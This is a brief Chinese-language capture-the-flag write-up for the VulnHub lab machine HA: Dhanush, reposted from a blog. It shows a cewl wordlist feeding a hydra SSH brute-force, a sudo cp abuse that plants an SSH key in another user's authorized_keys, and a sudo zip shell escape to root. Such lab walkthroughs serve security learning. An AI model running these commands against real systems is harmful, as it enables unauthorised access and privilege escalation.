靶機下載鏈接:
https://www.vulnhub.com/entry/ha-dhanush,396/
主機掃描:
主機埠掃描:
HTTP目錄爬取
使用dirb dirsearch 爬取均未發現可利用的目錄
另外看到ssh埠開啟了,進行網頁爬取字典生成進行爆破
cewl http://10.10.202.147 -w dict.txt
╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr
嘗試復制passwd檔案提示無權限,用戶sarangy用戶才具有cp的root權限執行
這里的思路:
pinak用戶生成秘鑰對,然后使用過cp命令復制到用戶sarang用戶的.ssh目錄為authorized_keys檔案
然后ssh -i rsa_id 進行登錄,嘗試提權
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
zip命令提權
sudo zip /tmp/test.zip /home/sarang/test -T --unzip-command="sh -c /bin/bash"
OVER!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/5384.html
標籤:訊息安全